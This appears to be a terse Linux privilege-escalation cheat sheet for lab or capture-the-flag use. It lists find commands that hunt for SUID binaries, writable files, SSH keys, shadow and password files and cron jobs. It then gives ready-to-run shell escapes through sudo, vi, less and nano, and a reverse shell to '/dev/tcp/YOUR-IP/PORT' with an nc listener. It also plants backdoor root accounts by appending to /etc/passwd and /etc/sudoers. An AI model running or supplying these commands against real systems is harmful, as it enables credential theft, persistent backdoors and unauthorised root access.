find /home -name "*.txt"
find /home -iname "*.txt"
find / -type d
find / -perm 755
find / -perm -4000
find / -perm /2000
find /home -size +1M
find / -user root
find / -group admin
find / -name "*.txt" -or -name "*.md"
find / -not -name "*.log"
find /home -name "*.txt" -exec cat {} \;
find /home -name "*.txt" -exec rm {} +
find /home -name "*.txt" -ls
find /home -name "*.txt" -printf "%p %s\n"
find / -regex ".*\.\(txt\|md\)"
find / -name "*.log" -exec rm {} \;
find /home -type d -empty
find / -user root


find / -perm -4000 -type f 2>/dev/null   # Find SUID binaries (run as owner, usually root)
find / -perm -2000 -type f 2>/dev/null   # Find SGID binaries (run as group)
find / -perm -6000 -type f 2>/dev/null   # Find both SUID and SGID

find / -type f -writable 2>/dev/null
find / -type f -perm -0002 2>/dev/null
find / -type f -perm -0020 2>/dev/null   # Group writable

find / -type d -perm -0002 -print 2>/dev/null
find / -type d -perm -0020 -print 2>/dev/null

find / -user root -type f 2>/dev/null

find / -name "*.conf" -o -name "*.ini" -o -name "*.yaml" -o -name "*.json" 2>/dev/null
find / -name "*password*" -o -name "*passwd*" -o -name "*shadow*" 2>/dev/null

find / -name "id_rsa" -o -name "id_dsa" -o -name "authorized_keys" -o -name "known_hosts" -o -name ".ssh" 2>/dev/null

find / -mtime -1 -ls 2>/dev/null    # Modified in the last 1 day
find / -ctime -1 -ls 2>/dev/null    # Changed in the last 1 day
find / -atime -1 -ls 2>/dev/null    # Accessed in the last 1 day

find / -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" 2>/dev/null

find / -type f -name ".*" 2>/dev/null
find / -type d -name ".*" 2>/dev/null

find / -name "*.sh" -o -name "*.log" -o -name "*.php" -o -name "*.py" 2>/dev/null

find / -user root -perm -u+x -type f -name "*.sh" 2>/dev/null

find / -user root -perm -4000 -exec ls -la {} 2>/dev/null \;
find / -user root -perm -4000 -exec ls -la {} 2>/dev/null \;

find / -perm -2000 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

find / -perm -2 -type d 2>/dev/null
find / -user root -perm -2 -type f 2>/dev/null

find / -type f -perm -o+r 2>/dev/null
find / -type f -perm -o+w 2>/dev/null

find / -nouser -o -nogroup 2>/dev/null

find /etc/cron* -type f 2>/dev/null
find /etc/cron* -type f -perm -o+w 2>/dev/null
cat /etc/crontab
ls -la /var/spool/cron/

find / -name ".*" -type f 2>/dev/null
find / -name ".*" -type d 2>/dev/null

find / -name "id_rsa*" 2>/dev/null
find / -type f -name "id_rsa*" -perm -o+r 2>/dev/null

find / -name "passwd" -o -name "shadow" 2>/dev/null
ls -la /etc/shadow
find / -name ".bash_history" -o -name ".mysql_history" -o -name ".psql_history" 2>/dev/null

find / -type f -name "*.conf" -exec grep -Ei "password|pass|pwd|secret" {} 2>/dev/null \;
grep -r "password" /etc 2>/dev/null

ps aux
ps aux | grep root

For exploit : https://gtfobins.github.io/



Reverse shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import os; os.system("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

perl -e 'exec "/bin/bash";'

sudo -l
sudo bash
sudo su
sudo -u root /bin/bash
sudo <binary> /bin/bash

sudo find . -exec /bin/bash \;

sudo less /etc/passwd
!/bin/bash

awk 'BEGIN {system("/bin/bash")}'

sudo vi

:set shell=/bin/bash
:shell

sudo nano
reset; sh 1>&0 2>&0

echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd
su hacker

find / -perm -4000 -type f 2>/dev/null
./bash -p
https://gtfobins.github.io/

sudo env /bin/bash
echo "/bin/bash -i >& /dev/tcp/YOUR-IP/PORT 0>&1" > /path/to/script.sh
chmod +x /path/to/script.sh
nc -lvnp PORT

echo "hacker ALL=(ALL) NOPASSWD:ALL" | sudo tee -a /etc/sudoers
sudo su

whoami
hostname
cat /root/proof.txt
export TERM=xterm
stty raw -echo; fg
reset



